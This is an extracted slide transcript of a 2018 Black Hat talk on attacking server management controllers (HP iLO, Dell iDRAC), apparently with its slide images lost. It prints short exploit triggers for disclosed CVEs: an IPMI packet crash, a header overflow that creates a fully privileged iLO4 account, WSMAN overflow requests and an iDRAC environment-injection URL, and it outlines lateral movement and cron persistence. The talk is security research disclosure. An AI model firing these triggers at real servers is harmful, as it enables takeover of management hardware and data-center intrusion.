of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage...
Transcript of of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage...
![Page 1: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/1.jpg)
The
of BMCunbearable lightness
Blackhat 20181
![Page 2: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/2.jpg)
2
![Page 3: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/3.jpg)
3
![Page 4: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/4.jpg)
Welcome
ofto a world
infinite hardware 4
![Page 5: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/5.jpg)
5
![Page 6: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/6.jpg)
6
![Page 7: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/7.jpg)
7
![Page 8: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/8.jpg)
8
![Page 9: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/9.jpg)
9
![Page 10: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/10.jpg)
10
![Page 11: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/11.jpg)
11
![Page 12: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/12.jpg)
Nico Waisman
VP LATAM
WHO ARE WE?
@nicowaismanSR SECURITY RESEARCHER
MATIAS SOLER
@GNULER12
![Page 13: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/13.jpg)
B M
C
Independent from the OSRemote ControlMonitoring:
TemperatureVoltageFans
13
![Page 14: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/14.jpg)
14
![Page 15: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/15.jpg)
15
![Page 16: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/16.jpg)
B M
C
Full Network StackKVMSerial ConsolePower Management
16
![Page 17: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/17.jpg)
(OR A Backdoor)
17
![Page 18: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/18.jpg)
18
![Page 19: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/19.jpg)
While your
IS PLUGGED InSERVER
your bmc is on19
![Page 20: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/20.jpg)
20
![Page 21: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/21.jpg)
21
idracILO
IMM
![Page 22: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/22.jpg)
NEC v850HP ILO 2
ThreadX
22
![Page 23: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/23.jpg)
ARMHP ILO 4
GHS INTEGRITY
23
![Page 24: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/24.jpg)
SUPER HIMM/iDRAC
LINUX
24
![Page 25: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/25.jpg)
And remote...
25
PRE AUTH
![Page 26: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/26.jpg)
TheExcitement
of Auditing
bmc26
![Page 28: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/28.jpg)
ATTACKSurface
28
![Page 29: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/29.jpg)
SMASH
UDP/161,162
SNMP
TCP/22
HTTPS IPMI OTHER
TCP/80,443 UDP/623 Standalone WSMAN
KVM
VNC
29
![Page 30: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/30.jpg)
SMASH
Command line standardized for DTMFRuns over SSHMost of the attack surface is post-auth. However post-auth is still useful to triage/debug other attacks
30
![Page 31: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/31.jpg)
SMASH
31
![Page 32: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/32.jpg)
SMASH
ENABLES A REMOTE CONSOLE! :DTEXTCONS
32
![Page 33: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/33.jpg)
SMASH
https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/33
![Page 34: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/34.jpg)
SNMP
$ snmpwalk -v1 -c public -m "./immalert.mib" 192.168.1.129 34
![Page 35: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/35.jpg)
SNMP
35
![Page 36: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/36.jpg)
BMC has an infamous protocol called IPMI UDP/623Used to remotely manage BMC and access most of the capabilities
IPMI
Including the Serial Console over UDP
36
![Page 37: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/37.jpg)
In 2013 the ITWorld magazine called IPMI the most dangerous protocol in the world...
37
![Page 38: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/38.jpg)
Authentication Bypass on Cipher Zero
RAKP Authentication debacle
IPMI
● (1,2) Dan Farmer IPMI research● (3) “A Case of Weak Session-ID
https://labs.mwrinfosecurity.com/blog/cve-2014-8272/
Predictable Session ID
38
1
2
3
Previous Work
![Page 39: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/39.jpg)
HTTPS
length = \ IPMI_Packet->Message_Length – 6;mem = pool_block_allocate()memcpy(mem, source, length);
HP ILO 2CVE-2017-8979
39
IPMI Zero Length Pool OverflowIPMI
![Page 40: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/40.jpg)
HTTPS Easy exploit to trigger on ILO2 < 2.32
40
buf = "0600ff07000000000000000000092018c88100388e04b5"mess= [int(buf[a:a+2], 16) for a in range(0,len(buf), 2)]p = 13nm = mess[:p] + [0] + mess[p+1:]s = SendPacket(nm, sys.argv[1], IPMI_PORT)
IPMI
![Page 41: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/41.jpg)
HTTPS
Interesting target
PREFERED BY sysadmin & firewalls, OPEN BY DEFAULTMost of them use popular embedded webs server: AppwebHowever some vendors implement their own server
41
![Page 42: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/42.jpg)
HTTPS
(on HP ILO)
URL/cgi-bin/discover(On DELL iDRAC)
URL/xmldata?item=all
42
Discovering BMCs
![Page 43: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/43.jpg)
HTTPS
Fabien PERIGAUD Alexandre GAZET Joffrey CZARNY from Synacktiv/Airbus43
HP ILO 4 <2.53CVE-2017-12542sscanf(“%*S %s”)
![Page 44: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/44.jpg)
HTTPS Easy exploit to trigger on ILO4 < 2.53
exploit_trigger = {'Connection' : 'A'*29}accounts_url = 'https://%s/rest/v1/AccountService/Accounts'response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
44
Oem = { 'Hp' : { 'LoginName' : username, 'Privileges': { 'LoginPriv' : True, 'RemoteConsolePriv': True, 'UserConfigPriv' : True, 'VirtualMediaPriv': True, 'iLOConfigPriv':True, 'VirtualPowerAndResetPriv':True, } } }
body = { 'UserName':username, 'Password':password, 'Oem':Oem }
![Page 45: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/45.jpg)
HTTPS
$ curl 'https://x.x.x.x/cgi-bin/login?LD_DEBUG=files'
HTTP/1.1 503 Service UnavailableKeep-Alive: timeout=60, max=199[...]
24986: file=/usr/lib/libfipsint.so.0.0.0 [0]; needed by /usr/local/cgi-bin/login [0]24986: file=/usr/lib/libfipsint.so.0.0.0 [0]; generating link map24986: dynamic: 0x295689e8 base: 0x29558000 size: 0x00010b2424986: entry: 0x29558680 phdr: 0x29558034 phnum: 4
iDRAC 8CVE-2018-1207
45
Environment Variable Injection leads to RCE
![Page 46: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/46.jpg)
We know What you are thinking/proc/self/fd/0
46
![Page 47: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/47.jpg)
HTTPS
The putfile CGI allow unauth users to store arbitrary content in a file
Limited to 128kB
File /tmp/sshpkauthupload.tmp
47
Environment Variable Injection leads to RCE
![Page 48: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/48.jpg)
48
![Page 49: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/49.jpg)
DEMO TIME!49
![Page 50: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/50.jpg)
HTTPS
Opens the attack surface to another layer of attacks:
WS-MAN
Redfish
RIBCL
50
![Page 51: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/51.jpg)
REDFish is a RESTful API created by DTMF after the IPMI fiasco
HTTPS
Uses JSON to communicate
Endpoints available at /redfish/v1/51
![Page 52: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/52.jpg)
HTTPS
52
![Page 53: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/53.jpg)
HTTPS
RIBCL is an HP ILO solution for configuration and management using XML over HTTPThe /RIBCL endpoint is accessible pre authenticationRIBCL itself handles the authentication through the XML protocol
53
![Page 54: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/54.jpg)
WSMAN
Web Service ManagementMicrosoft supports this natively (Win-RM)Similar syntax to XML but with certain variations (based on SOAP)Used extensively due to Powershell support
54
![Page 55: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/55.jpg)
WSMAN
Generally accessible through an HTTPS endpoint /wsman
But could be found standalone on port tcp/5985
55
Auth: Basic Auth, Digest-Auth, Kerberos
![Page 56: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/56.jpg)
56
![Page 57: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/57.jpg)
ROM:001108B4 movhi 0x1F, r0, r7ROM:001108B8 movea 0xAE0, r7, r7 // "%[^:]:%s"ROM:001108BC addi 0x80, sp, r8ROM:001108C0 addi 0xC0, sp, r9ROM:001108C4 jarl sscanf, lp // sscanf(arg2, "%[^:]:%s", sp[0x80], sp[0xC0])ROM:001108C8 cmp 2, r10ROM:001108CA bz loc_1108E
HP ILO 2CVE-2017-8979
57
Preauth Stack-Based Buffer Overflow in Wsman XML Tag Name ParsingWSMAN
![Page 58: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/58.jpg)
HTTPS Easy exploit to trigger on ILO2 < 2.32
58
import requestsheaders = {'Content-Type': 'application/soap+xml;charset=UTF-8'}payload = "<x:" + "B" * 0x300 + ">\n</x>"r = requests.post('https://x.x.x.x/wsman', data=payload, verify=False, headers=headers)print r.text
WSMAN
![Page 59: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/59.jpg)
HTTPS
ROM:00110574 addi 0, sp, r27ROM:00110578 movhi 0x1F, r0, r7ROM:0011057C movea 0xAAC, r7, r7 //"xmlns:%[^=]ROM:00110580 mov r27, r8 // r8 = s27 = sp[0] = dst bufferROM:00110582 jarl sscanf, lp // r6 buffer, r7 fmtstring, etc.ROM:00110586 cmp r0, r10ROM:00110588 bnz loc_11058E
HP ILO 2CVE-2017-8979
59
Preauth Stack-Based Buffer Overflow in Wsman XMLnsWSMAN
![Page 60: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/60.jpg)
HTTPS Easy exploit to trigger in ILO2 < 2.32
60
import requestsheaders = {'Content-Type': 'application/soap+xml;charset=UTF-8'}payload = "<x xmlns:" + "B" * 0x24C + "=\"\">\n</x>"r = requests.post('https://x.x.x.x/wsman', data=payload, verify=False, headers=headers)print r.text
WSMAN
![Page 61: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/61.jpg)
Or how to move around the DMZ with impunity61
MULTI-DIMENSIONALMOVEMENT
![Page 62: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/62.jpg)
62
![Page 63: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/63.jpg)
63
![Page 64: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/64.jpg)
64
#1 Hack the BMC
![Page 65: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/65.jpg)
65
#2 Hack the server
![Page 66: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/66.jpg)
BMC -> Server
Serial Console
Mount a remote DVD
KVM (VNC, Custom protocol, etc)
66
DMA
![Page 67: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/67.jpg)
DEMO TIME!67
![Page 68: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/68.jpg)
68
#1 Hack the Server
![Page 69: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/69.jpg)
69
Gain access to the management network from the internet
#2 Hack the BMC
![Page 70: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/70.jpg)
Server -> BMC
On some BMCs, OS Tools are Unauthenticated
Flash the Firmware
Enable an emulated network, compromise it using one of our bugs.
Allow you to create users on the BMC
70
![Page 71: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/71.jpg)
Server -> BMC
On some BMCs, OS Tools are Unauthenticated
Flash the Firmware
Enable an emulated network, compromise it using one of our bugs.
Allow you to create users on the BMC
71
![Page 72: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/72.jpg)
DEMO TIME!72
![Page 73: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/73.jpg)
73
![Page 74: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/74.jpg)
DEMO TIME!74
![Page 75: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/75.jpg)
Like the 90’s kids75
PERSISTENCE
![Page 76: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/76.jpg)
B M
C
Flashing the firmware is easy, however it’s signed.
11 hour 12 WEEKS76
![Page 77: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/77.jpg)
Hey ‘90s kid! you are old
77
![Page 78: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/78.jpg)
/dev/mmcblk0p14 on /flash/data2 type ext2 (rw,noatime,errors=continue)/dev/mmcblk0p13 on /mnt/cores type ext3 (rw,noatime,errors=continue,user_xattr,barrier=1,data=writeback)/dev/mmcblk0p12 on /mmc1 type ext3 (rw,noatime,errors=continue,user_xattr,barrier=1,data=ordered)/dev/mmcblk0p9 on /flash/pd9 type squashfs (ro,noatime)/dev/mmcblk0p11 on /flash/data0 type ext3 (rw,noatime,errors=continue,barrier=1,data=ordered)/dev/mmcblk0p15 on /mmc2 type ext3 (rw,noatime,errors=continue,barrier=1,data=ordered)tmpfs on /var/volatile type tmpfs (rw,relatime)mtd:lcl on /flash/data1 type jffs2 (rw,noatime)/dev/mmcblk0p9 on /flash/pd0 type squashfs (ro,noatime)
List and check all the
78
![Page 79: of BMC - i.blackhat.com · BMC has an infamous protocol called IPMI UDP/623 Used to remotely manage BMC and access most of the capabilities IPMI Including the Serial Console over](https://reader030.fdocuments.us/reader030/viewer/2022021714/5be7fd4709d3f2d66c8ceefb/html5/thumbnails/79.jpg)
$ cd /var/spool/cron$ ls -lhadrwxr-xr-x 2 root root 31 Jul 27 2017 .drwxr-xr-x 3 root root 27 Jul 27 2017 ..lrwxrwxrwx 1 root root 21 Jul 27 2017 crontabs -> /flash/data0/crontabs
No shame on persisting through cron, Right? Right!?
79
